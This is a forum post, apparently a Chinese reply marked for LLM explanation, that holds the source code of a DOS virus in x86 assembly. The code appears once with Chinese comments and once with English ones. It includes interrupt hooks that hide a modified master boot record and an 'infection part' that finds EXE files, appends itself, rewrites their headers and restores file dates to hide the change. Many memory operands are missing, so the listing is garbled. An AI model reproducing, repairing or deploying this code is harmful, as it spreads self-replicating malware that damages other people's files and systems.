『第 16 楼』:
使用 LLM 解释/回答一下
SM PROC ;|---;子程序SM的作用:
MOV AX,DS: ;| ;将中断10H,13H分别保存
MOV DS:,AX ;| ;至85H,86H,并修改10H,13H
MOV AX,DS: ;| ;指向新中断部分
MOV DS:,AX ;|
;|
MOV AX,DS: ;|
MOV DS:,AX ;|
MOV AX,DS: ;|
MOV DS:,AX ;|
;|
MOV AX,OFFSET NEW10H-OFFSET HDP ;|
MOV DS:,AX ;|
MOV AX,22H ;|
MOV DS:,AX ;|
;|
MOV AX,OFFSET NEW13H-OFFSET HDP ;|
MOV DS:,AX ;|
MOV AX,22H ;|
MOV DS:,AX ;|
RET ;|
SM ENDP ;|
NEW10H:CMP AH,00 ;|-;新中断10H的作用:
JZ N1 ;| ;检测是否调用功能00H
INT 85H ;| ;是->将主代码装入内存
IRET ;| ; 并执行
N1: PUSH AX ;| ;否->调用原中断10H
PUSH BX ;|
PUSH CX ;|
PUSH DX ;|
PUSH DS ;|
PUSH ES ;|
;|
MOV AX,8000H ;|
MOV ES,AX ;|
;|
MOV AX,0202H ;|
XOR BX,BX ;|
MOV CX,0002H ;|
MOV DX,0080H ;|
INT 13H ;|
;|
MOV BX,OFFSET JMP_MAIN-OFFSET HDP ;|
JMP DWORD PTR CS:
NEW13H<img src="images/smilies/face-raspberry.png" align="absmiddle" border="0">USHF ;|----------------------;新中断13H的作用:
CMP CX,0001H ;| ;检测是否读主引导扇区
JNZ NGW ;| ;是->读0面0道4扇区
CMP AH,02H ;| ;否->调用原中断13H
JNZ NGW ;|
CMP DX,0080H ;|
JNZ NGW ;|
;|
MOV CX,0017H ;|
NGW: POPF ;|
INT 86H ;|
IRET ;|
;** PART 4:传染部分 ******************************************************
MAIN: MOV AX,CS
MOV ES,AX
MOV DS,AX
MOV AH,1AH ;|
MOV DX,OFFSET DTA ;|-----------------;设置DTA(磁盘传输地址)
INT 21H ;|
MOV AH,4EH ;|
JMP DIR ;|
SDIR: MOV AH,4FH ;| ;在当前目录中搜索第一个
DIR : MOV DX,OFFSET FNEXE ;|---------------;EXE文件
MOV CX,100111B ;| ;找到->继续
INT 21H ;| ;没找到->转HW
JC HW ;|
CMP DS:,BYTE PTR 77 ;| ;检测是否已感染
JZ SDIR ;| ;是->搜索下一个EXE文件
MOV CX,DS: ;| ; 直到找到或搜索完
CMP CX,09H ;|----------; 目录为止
JNB SDIR ;| ;否->实施传染
;| ;注:如果文件已感染或文
CALL GR ;| ; 长度超过90000H都不
; 会传染.
HW: POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
INT 85H ;|---------------------------;执行原中断10H
IRET
GR PROC ;|------------------------------;子程序GR作用:
;传染EXE文件
MOV DX,OFFSET FN ;|
MOV AX,4301H ;|-----------------;置文件属性为:普通
MOV CX,100000B ;|
INT 21H ;|
MOV AX,3D02H
INT 21H ;|-----------------;打开文件
MOV BX,AX
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,8H ;|
INT 21H ;|--------------;读文件头节长度
MOV AH,3FH ;|
MOV CX,2H ;|
MOV DX,OFFSET H_EXE ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,14H ;|
INT 21H ;|---------------;保存原文件的 CS:IP
MOV AH,3FH ;| ;初始值
MOV CX,4H ;|
MOV DX,OFFSET B_IP ;|
INT 21H ;|
MOV AX,4202H ;|
XOR CX,CX ;|
XOR DX,DX ;|
INT 21H ;|
MOV DX,DS: ;|
MOV AX,DS: ;|
MOV CX,10H ;| ;使原文件的长度为10H的
DIV CX ;|-----------------;倍数,目的是为了使自身
INC AX ;| ;能运行在CS:00的环境下
SUB AX,DS: ;|
MOV DS:,AX ;|
SUB CX,DX ;|
PUSH CX ;|
MOV AH,40H ;|
INT 21H ;|
MOV AH,40H ;|
MOV CX,OFFSET P_SIZE ;|--------------;将自身附加在文件结尾
XOR DX,DX ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,02H ;|
INT 21H ;|
MOV DX,DS: ;|
MOV AX,DS: ;|
POP CX ;|
ADC AX,CX ;| ;将新文件的长度转换成
JNC NC1 ;| ;(页长度+最后一个扇区字节数)
INC DX ;|-----------;的形式
NC1: ADC AX,OFFSET P_SIZE ;| ;并将此结果写入EXE文件头
JNC NC2 ;|
INC DX ;|
NC2: MOV CX,200H ;|
DIV CX ;|
INC AX ;|
MOV DS:,DX ;|
MOV DS:,AX ;|
MOV DX,OFFSET B_EXE ;|
MOV CX,4H ;|
MOV AH,40H ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,14H ;|
INT 21H ;|-------------;将计算后的新CS:IP初始值写
MOV AH,40H ;| ;入EXE文件头
MOV CX,4H ;|
MOV DX,OFFSET N_IP ;|
INT 21H ;|
MOV AX,5701H ;|
MOV CH,DS: ;| ;改回文件修改日期并打上
MOV CL,77 ;|----------------;已感染标志
MOV DX,DS: ;|
INT 21H ;|
MOV AH,3EH ;|---------------------;关闭文件
INT 21H ;|
MOV DX,OFFSET FN ;|
MOV AX,4301H ;|
XOR CH,CH ;|---------------;改回文件属性
MOV CL,DS: ;|
INT 21H ;|
RET ;|
GR ENDP
;|---------------;DTA(磁盘传输地址)的格式如下:
DTA DB 21 DUP(0) ;|---------------;DOS功能4FH将使用这些字节
C DB 0 ;|---------------;文件属性
T_L DB 0 ;|---------------;文件时间的低位
T_H DB 0 ;|---------------;文件时间的高位
D DW 0 ;|---------------;文件日期
S_L DW 0 ;|---------------;文件长度的低位
S_H DW 0 ;|---------------;文件长度的高位
FN DB 13 DUP(0) ;|---------------;文件的全名
P_SIZE:
CSEG ENDS
END START
```asm
SM PROC ;|---;Function of subroutine SM:
MOV AX,DS: ;| ;Save interrupt 10H, 13H respectively
MOV DS:,AX ;| ;To 85H, 86H, and modify 10H, 13H
MOV AX,DS: ;| ;Point to the new interrupt part
MOV DS:,AX ;|
;|
MOV AX,DS: ;|
MOV DS:,AX ;|
MOV AX,DS: ;|
MOV DS:,AX ;|
;|
MOV AX,OFFSET NEW10H-OFFSET HDP ;|
MOV DS:,AX ;|
MOV AX,22H ;|
MOV DS:,AX ;|
;|
MOV AX,OFFSET NEW13H-OFFSET HDP ;|
MOV DS:,AX ;|
MOV AX,22H ;|
MOV DS:,AX ;|
RET ;|
SM ENDP ;|
NEW10H:CMP AH,00 ;|-;Function of new interrupt 10H:
JZ N1 ;| ;Check if function 00H is called
INT 85H ;| ;Yes->Load the main code into memory
IRET ;| ; And execute
N1: PUSH AX ;| ;No->Call the original interrupt 10H
PUSH BX ;|
PUSH CX ;|
PUSH DX ;|
PUSH DS ;|
PUSH ES ;|
;|
MOV AX,8000H ;|
MOV ES,AX ;|
;|
MOV AX,0202H ;|
XOR BX,BX ;|
MOV CX,0002H ;|
MOV DX,0080H ;|
INT 13H ;|
;|
MOV BX,OFFSET JMP_MAIN-OFFSET HDP ;|
JMP DWORD PTR CS:
NEW13H:PUSHF ;|----------------------;Function of new interrupt 13H:
CMP CX,0001H ;| ;Check if reading the main boot sector
JNZ NGW ;| ;Yes->Read sector 4 of track 0, side 0
CMP AH,02H ;| ;No->Call the original interrupt 13H
JNZ NGW ;|
CMP DX,0080H ;|
JNZ NGW ;|
;|
MOV CX,0017H ;|
NGW: POPF ;|
INT 86H ;|
IRET ;|
;** PART 4:Infection part ******************************************************
MAIN: MOV AX,CS
MOV ES,AX
MOV DS,AX
MOV AH,1AH ;|
MOV DX,OFFSET DTA ;|-----------------;Set DTA (disk transfer address)
INT 21H ;|
MOV AH,4EH ;|
JMP DIR ;|
SDIR: MOV AH,4FH ;|
MOV DX,OFFSET FNEXE ;|---------------;Search for the first EXE file in the current directory
MOV CX,100111B ;| ;Found->Continue
INT 21H ;| ;Not found->Jump to HW
JC HW ;|
CMP DS:,BYTE PTR 77 ;| ;Check if already infected
JZ SDIR ;| ;Yes->Search for the next EXE file
MOV CX,DS: ;| ; Until found or the directory is searched
CMP CX,09H ;|----------; End
JNB SDIR ;| ;No->Implement infection
;| ;Note: If the file is already infected or the text
CALL GR ;| ; length exceeds 90000H, it will not be infected.
HW: POP ES
POP DS
POP DX
POP CX
POP BX
POP AX
INT 85H ;|---------------------------;Execute the original interrupt 10H
IRET
GR PROC ;|------------------------------;Function of subroutine GR:
;Infect EXE files
MOV DX,OFFSET FN ;|
MOV AX,4301H ;|-----------------;Set file attribute to: normal
MOV CX,100000B ;|
INT 21H ;|
MOV AX,3D02H
INT 21H ;|-----------------;Open file
MOV BX,AX
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,8H ;|
INT 21H ;|--------------;Read the header section length of the file
MOV AH,3FH ;|
MOV CX,2H ;|
MOV DX,OFFSET H_EXE ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,14H ;|
INT 21H ;|---------------;Save the initial value of CS:IP of the original file
MOV AH,3FH ;| ;
MOV CX,4H ;|
MOV DX,OFFSET B_IP ;|
INT 21H ;|
MOV AX,4202H ;|
XOR CX,CX ;|
XOR DX,DX ;|
INT 21H ;|
MOV DX,DS: ;|
MOV AX,DS: ;|
MOV CX,10H ;| ;Make the length of the original file a multiple of 10H, aiming to enable itself
DIV CX ;|-----------------;To run in the environment of CS:00
INC AX ;| ;
SUB AX,DS: ;|
MOV DS:,AX ;|
SUB CX,DX ;|
PUSH CX ;|
MOV AH,40H ;|
INT 21H ;|
MOV AH,40H ;|
MOV CX,OFFSET P_SIZE ;|--------------;Append itself to the end of the file
XOR DX,DX ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,02H ;|
INT 21H ;|
MOV DX,DS: ;|
MOV AX,DS: ;|
POP CX ;|
ADC AX,CX ;| ;Convert the new file length into
JNC NC1 ;| ;(page length + number of bytes in the last sector)
INC DX ;|-----------;Form and write this result into the EXE file header
NC1: ADC AX,OFFSET P_SIZE ;| ;
JNC NC2 ;|
INC DX ;|
NC2: MOV CX,200H ;|
DIV CX ;|
INC AX ;|
MOV DS:,DX ;|
MOV DS:,AX ;|
MOV DX,OFFSET B_EXE ;|
MOV CX,4H ;|
MOV AH,40H ;|
INT 21H ;|
MOV AX,4200H ;|
XOR CX,CX ;|
MOV DX,14H ;|
INT 21H ;|-------------;Write the calculated new initial value of CS:IP into the EXE file header
MOV AH,40H ;| ;
MOV CX,4H ;|
MOV DX,OFFSET N_IP ;|
INT 21H ;|
MOV AX,5701H ;|
MOV CH,DS: ;| ;Change back the file modification date and mark the infected flag
MOV CL,77 ;|----------------;
MOV DX,DS: ;|
INT 21H ;|
MOV AH,3EH ;|---------------------;Close file
INT 21H ;|
MOV DX,OFFSET FN ;|
MOV AX,4301H ;|
XOR CH,CH ;|---------------;Change back the file attribute
MOV CL,DS: ;|
INT 21H ;|
RET ;|
GR ENDP
;|---------------;The format of DTA (disk transfer address) is as follows:
DTA DB 21 DUP(0) ;|---------------;DOS function 4FH will use these bytes
C DB 0 ;|---------------;File attribute
T_L DB 0 ;|---------------;Low byte of file time
T_H DB 0 ;|---------------;High byte of file time
D DW 0 ;|---------------;File date
S_L DW 0 ;|---------------;Low byte of file length
S_H DW 0 ;|---------------;High byte of file length
FN DB 13 DUP(0) ;|---------------;Full name of the file
P_SIZE:
CSEG ENDS
END START
```
|
